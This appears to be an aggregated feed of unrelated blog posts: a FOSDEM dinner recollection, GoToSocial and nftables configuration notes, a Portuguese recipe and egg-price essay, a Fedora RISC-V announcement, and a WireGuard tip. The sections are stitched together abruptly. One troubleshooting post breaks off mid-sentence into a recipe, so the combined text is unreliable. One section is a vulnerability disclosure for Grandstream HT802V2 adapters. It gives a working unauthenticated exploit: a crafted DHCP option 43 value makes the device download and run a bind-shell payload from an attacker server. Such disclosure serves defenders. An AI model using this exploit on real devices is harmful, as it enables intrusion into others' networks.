Sifting through a bunch of dining places at Grand Place, we finally settled for the trustworthy Drug Opera restaurant that Sumantro and I visited a couple of years back during FOSDEM 2023. It was remarkable just how different yet similar the place felt after many years when we were seated down one level above the ground. As we were served our food, I remarked just how this place stood out to me back then because of the tricky navigation amidst multiple floors of seating. I got some Spaghetti Bolognese, while Sumantro got Fish and Chips, and Sudhir got Chicken Vol Au Vent for dinner. Among various things that we talked about, I opened up to them with the poor experience that I had the night before with the verbal dispute and I soon got to know that I was not the only one who had that experience then.
You should be able to taste the Spaghetti Bolognese once they open source the technology of tasting food items from photographs
We discussed how poorly it reflected on a certain part of the community as the experience just ends up making folks feel unsafe about a certain group of people in general regardless of what their actual intentions are. As we were getting full, Sumantro offered to pay for the dinner and I heard from Michael who wanted to join us. I seemed to have gotten his message from back when we were having beers at Delirium Cafe but we soon ran into him when we were on our way out from the restaurant. Opening up to him about the previous day's situation while we were on our way to the pickup spot of our Uber cab, he suggested me to report the incident to ensure that there is a historical report of misdemeanour. With goodbyes waved and Sudhir dropped at his place, Sumantro and I were soon back at the hotel.
I used podlet compose with the provided docker-compose.yaml just in order to get an initial template to create a systemd unit (quadlet? I still struggle with terminology). The process of going up and running was pretty straightforward.
I encountered two issues:
Since the VPS I installed GoToSocial on is IPv6 only, I was unable to follow many users.
Once configured a proxy to solve the previous issue, I got an error like this in the logs, stating that the IP address of the proxy was reserved.
While I was able to follow someone on some instances, while trying to follow many users I got this error in the browser:
404: Not Found
GoToSocial only serves Public statuses via the web.
If you reached this page by clicking on a status link, it's likely that the status is not Public. You can try entering the status URL in your client's search bar, to view the status from your account. If that doesn't work, it's possible that the status has been deleted by the author, you don't have permission to view it, or it doesn't exist at all.
And in the logs:
timestamp="22/02/2025 17:23:15.807" func=server.init.func2.Logger.13.1 level=INFO latency="979.819µs" userAgent="Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0" method=GET statusCode=404 path=/authorize_interaction clientIP=1.2.3.4 errors="Error #01: Not Found\n" requestID=blablablablabla msg="Not Found: wrote 4.99kiB"
The problem was that the VPS is IPv6 only.
Then I configured a proxy server on a VPS with an IPv4 address (and an IPv6 address, of course). I added these two lines:
Then
systemctl --user daemon-reload
and
systemctl --user restart gotosocial
In this way, the GoToSocial instance on the IPv6 only VPS should have been able to contact IPv4 addresses, but despite that, I was still unable to follow people.
Second issue: proxy IP address blocked / reserved IP range
Since the IP address of the HTTP proxy is in a private range, and GoToSocial blocks outgoing requests to these reserved addresses, I got an error like this:
1 colher (chá) de sumagre (sumac, à venda em lojas árabes)
1 colher (chá) de sal
1 colher (chá) de salsinha picada
Modo de Preparo
Asse a berinjela e as pimentas na brasa, na chama do fogão, no forno ou na air fryer. Quando a pele dos vegetais estiver toda queimada, reserve-os num recipiente fechado. O vapor vai facilitar a remoção da casca.
Numa tigela, misture os ingredientes restantes.
Quando a berinjela e as pimentas estiverem frias, remova a pele da berinjela e as sementes das pimentas. Pique e misture aos outros ingredientes. Sirva à temperatura ambiente, com pão.
Preço dos ovos está subindo devido a gripe aviária nos EUA. Exportações de ovos do Brasil para os EUA aumentam e isso causa inflação no preço do ovo por aqui também.
Nos dias de hoje, preço justo de ovos em São Paulo é 1 ovo ≈ R$1. Produto que custa mais do que R$1 por ovo, está cobrando por características de pouco valor real para o consumidor, como marketing ou green washing ou simplesmente grife.
Características que valem a pena pagar mais pelo ovo:
Tamanho
Características que não valem a pena pagar mais pelo ovo:
Caipira
Orgânico
Cor da casca
Este assunto é meio polêmico, mas inúmeros testes cegos comprovam que as pessoas não são capazes de notar diferença de sabor entre ovos. Veja estes:
O portal Serios Eats usou até corante para eliminar o viés causado pela cor da gema. Publicou seu relato no artigo «Ovos “melhores”, são mais gostosos?»
O pessoal do Ceia Clandestina também fez extensivos testes cegos e não conseguiu encontrar diferenças significativas entre os ovos
Quanto a cor da gema, os mesmos testes cegos mostram que cor não altera o sabor. A cor da gema pode ser manipulada com devida alimentação na granja. Criadores adicionam cúrcuma na alimentação das galinhas para deixar o amarelo da gema mais vivo.
A cor da casca é determinada pela raça da ave. É o fator menos relevante de todos, mas é o que mais dá nas vistas. Fato é que ovos orgânicos e caipiras oferecidos nas gôndolas sempre são de casca escura, provavelmente porque o consumidor associa casca branca com ovos comuns.
Quanto ao valor nutritivo, ovo de qualquer tipo é uma bomba nutricional. É provavelmente irrelevante a diferença nutricional entre o ovo mais comum e o mais elegante. Eu nunca vi esse tipo de comparação, porque deve ser irrelevante mesmo.
Características como “caipira”, “orgânico”, são as que mais elevam o preço do ovo e tem a ver com como a galinha é criada, caso isso seja importante para você. Isso é uma questão mais filosófica. Na minha opinião, isso soa como uma certa humanização da galinha, imputar no animal valores que seres humanos valorizam, como ser livre para pastar. Mas quem disse que isso é realmente importante para o animal, mais do que ter comida fácil a vontade? O fator “orgânico” para mim tem também alto teor de green washing, e geralmente não é o que o consumidor acha que é. Mesmo assim, a indústria tem padrões e leis que garantem um nível alto de qualidade até à granja mais simples.
Então tudo bem se você cultiva alguns valores que te levam a gastar mais com ovos. Mas saiba que estará igualmente bem servido, com nutrientes, higiene e qualidade em geral, até com o ovo mais barato.
#Fedora#CoreOS doesn't ship with firewalld, however there is still a firewall: nftables. Simply there is not the firewall-cmd frontend. (Forgive the terminology).
My goal was to restrict access to a port to a specific IP. The file to edit is
/etc/nftables/main.nft
In the chain allowstanza add a rule like
ip saddr 192.168.1.1 tcp dport 1234 accept
(ip6 if the address is IPv6)
and
tcp dport 8443 reject with icmp type host-unreachable
chain allow {
ct state established,related accept
meta l4proto @allowed_protocols accept
iifname @allowed_interfaces accept
tcp dport @allowed_tcp_dports accept
ip6 saddr fdd5:9e41:4ea0:2d2d::1f9 tcp dport 8443 accept
tcp dport 8443 reject with icmp type host-unreachable
}
In the chain INPUT remove policy accept and add policy drop
chain INPUT {
type filter hook input priority filter + 20
jump allow
policy drop
reject with icmpx type port-unreachable
}
Well, I don't know if it is perfect, but it seems to work.
At the end enable and start the nftables service
sudo systemctl enable nftables.service --now
Our everyday scientific and educational work relies heavily on hardware, software, and, in modern times, cloud services. The equipment that we will mention below is specific to our group; common services used by university and/or faculty employees will not be specifically mentioned here.
The Grandstream HT802V2 uses busybox' udhcpc for DHCP.
When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data.
On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
According to the documentation the format is <option_code><value_length><value>.
The only documented option code is 0x01 for the ACS URL.
However, if you pass other codes, these are accepted and parsed too.
Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh.
What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/shTEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1TEST_SERVER_PORT=8080cd/tmp
wget-q-t2-T5http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}if["$?"="0"];thenecho"Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"chmod+x${TEST_SCRIPT}corefile_dec${TEST_SCRIPT}if["`head -n 1 ${TEST_SCRIPT}`"="#!/bin/sh"];thenecho"Starting GS Test Suite..."./${TEST_SCRIPT}http://${TEST_SERVER}:${TEST_SERVER_PORT}fifi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget.
We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915.
But we also can just let the script download the file and execute it for us.
The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed.
I have no idea how the encryption works.
But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things!
The result gets correctly decrypted by corefile_dec back to the needed payload.
That means we can take a simple payload like:
#!/bin/sh# you need exactly that shebang, yes
telnetd-l/bin/sh-p1270&
Encrypt it using encfile and place it on a webserver as vendor_test.sh.
The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port.
This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222.
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't).
And boom, root shell on port 1270 :)
As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable.
Both of these variables were controllable using the existing gs_config interface after authentication.
But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)
Affected devices
HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
Most probably also other HT8xxV2, as they use the same firmware
Most probably also HT8xx(V1), as their /usr/share/udhcpc/default.script and /app/bin/vendor_test_suite.sh look very similar, according to firmware dumps
Fix
After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/shTEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1TEST_SERVER_PORT=8080VENDOR_SCRIPT="/tmp/run_vendor.sh"cd/tmp
wget-q-t2-T5http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}if["$?"="0"];thenecho"Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"chmod+x${TEST_SCRIPT}prov_image_dec--in${TEST_SCRIPT}--out${VENDOR_SCRIPT}if["`head -n 1 ${VENDOR_SCRIPT}`"="#!/bin/sh"];thenecho"Starting GS Test Suite..."chmod+x${VENDOR_SCRIPT}${VENDOR_SCRIPT}http://${TEST_SERVER}:${TEST_SERVER_PORT}fifi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.
In chapter 3 of Program Management for Open Source Projects, I talk about getting started as a new program manager in a community. I explain how to ease your way in and establish relationships and credibility. What I do not talk about is how to approach making sweeping changes.
You, my dear reader, are a smart person. You have lots of experience and many good ideas. What you don’t have is a license to swoop in and immediately tell a project how to make itself better. Even when you’re right, that sort of behavior is anti-social. It not only harms your ability to make long-term changes, but it can prove harmful or even fatal to the community as you drive people away.
No matter how they may look from the outside, most practices and policies made sense in the context that they were created in. Sometimes the context changes and the current structure is no longer appropriate, but you can’t know that unless you understand both the current and historical context. If you swoop in uninformed, you might make some correct decisions, but you’ll probably make more wrong ones.
When you’re new to a project, you have to take the time to learn what the project does and why. Only then can you figure out what “improvement” looks like for the project. If you think this also applies to a billionaire man-child and his cronies who are wrecking their way through the U.S. government, you are correct.
No, seriously. Sit back down–you can’t get off until the next stop anyways.
Fedora is jumping on the RISC-V train as a fifth architecture. While there’s still some work to be done, we’ve hit some major milestones towards a more open computing future. By embracing RISC-V, Fedora’s doubling down on its commitments to Freedom, Friends, Features, and First. Whether you’re a developer or an enthusiast, there’s only one thing this means: It’s time to start building.
Embracing Open-Source Hardware with RISC-V
RISC-V (pronounced “risk-five”) is an open-standard Instruction Set Architecture (ISA) based on Reduced Instruction Set Computing (RISC) principles. Unlike proprietary architectures, RISC-V is free and open. This allows anyone to design, manufacture, and sell RISC-V chips and software without licensing fees or restrictions. This openness removes barriers to innovation, fostering a collaborative, community-driven approach to hardware development similar to open-source software. Developers are empowered to customize processors for specific needs, sharing enhancements and optimizations that accelerate technological advancements.
RISC-V was developed at the University of California, Berkeley, in 2010. It was created to provide a simple, extensible ISA for computer architecture research and education. Recognizing its broader potential, the creators made it freely available to all. Since then, RISC-V has gained significant traction and evolved into a mature, competitive architecture governed by RISC-V International. With contributions from industry giants, academic institutions, and a passionate community, RISC-V represents a significant shift in the hardware industry toward an open and inclusive technological landscape.
Fedora’s Journey with RISC-V
Fedora’s interest in RISC-V isn’t new—the Fedora Project has been experimenting with the architecture since at least 2015. Over the better part of a decade, our hands-on development and community collaboration have paved the way for exciting milestones. While RISC-V is not yet a “primary” architecture within Fedora (see Fedora Architectures for details), we’re beginning to invest in it alongside Intel/AMD (x86_64), ARM (aarch64), IBM Power (ppc64le), and IBM Z (s390x). In time, it will be accessible to all Fedora packagers to submit builds to. Today, we’re excited to announce major milestones:
Integrated Infrastructure: We’re excited to share that a dedicated RISC-V Koji instance is now live in our Fedora data center. This new hardware is fully integrated with Fedora’s authentication and core services. In time it will be accessible to all Fedora packagers for submitting builds.
Ready-to-Boot Images: Fedora 41-based images are available, allowing you to quickly spin up a RISC-V board—or even a virtual machine—and experience Fedora on RISC-V firsthand.
Why This Matters for Developers and Users
Over the past year, there has been a surge of new RISC-V hardware hitting the market. The options for operating systems have been typically limited to Debian or a derivative thereof–or occasionally an older Fedora version/variant. In the RISC-V Special Interest Group (SIG), the focus has been on bringing together all the efforts to enable this emerging architecture for the wider Fedora community: keeping packages up to date with branched versions, building images for supported hardware, and integrating required package modifications upstream.
For Fedora users, this means there are now up-to-date Fedora images for a handful of popular RISC-V boards that SIG members have been running for many months to perform native builds. So, if you have any boards collecting dust, now is a great time to check out which hardware we’re working on and take Fedora on RISC-V for a spin.
For our Developers, there’s no need to worry. If you want to get involved, more information will be available in the coming months as the Koji infrastructure is deployed and configured. At the moment, a dist-git “overlay” is used for a number of packages in order to enable this new architecture. This is necessary as there are often upstream changes required which affect only the new architecture. While the upstreaming work is in progress, the overlay setup allows the SIG to collaborate more effectively on the changes.
Those wishing to follow along or contribute to the SIG are encouraged to join us on Matrix, and to review the RISC-V Tracker that is available to track the upstreaming progress, as well as the SIG page.
Getting Started with Fedora on RISC-V
If you’re ready to try Fedora on RISC-V, here’s how to get started:
Supported Hardware
For a hassle-free Fedora experience on RISC-V, we currently offer ready-to-boot images for the following platforms:
StarFive VisionFive 2 (VF2): Our flagship board running a mainline kernel. It offers a fully open experience with the generic Fedora image.
QEMU: Ideal for experimentation, QEMU lets you run Fedora on RISC-V in a virtual environment with the same mainline kernel support. Check out the Fedora RISC-V QEMU guide for step-by-step instructions on setting up a virtual environment.
SiFive HiFive Premier P550: This board boots with a provided image using a vendor kernel. While it works out of the box, please note that it relies on vendor firmware, which may limit certain features.
Additional Hardware
Banana Pi BPI-F3 and Milk-V Jupiter M1/K1: Fedora on this board is possible for those who aren’t afraid of a bit of work. Although not supported out of the box, it remains an interesting option for those willing to experiment and contribute improvements.You can check out the SpacemiT Fedora Install Guide if that sounds like you.
Installation Instructions
To get started with Fedora on RISC-V, visit the installation guide for detailed steps on flashing an image to your board or setting up a virtual machine.
Get Involved
Want to contribute to Fedora’s RISC-V efforts? Join the conversation on Matrix, track the progress in the RISC-V Tracker, and check out the SIG page for more details on how to get involved.
The future of open-source hardware is here, and Fedora is at the forefront. Whether you’re a developer looking to port software or an enthusiast eager to explore the ecosystem, there’s never been a better time to jump aboard. Let’s build the future together.
You can also define the DNS servers to use when the VPN is up: just add DNS = 2a0f:fc80::, 2a09::, 193.110.81.0, 185.222.222.222 or the like, to the Interface stanza.
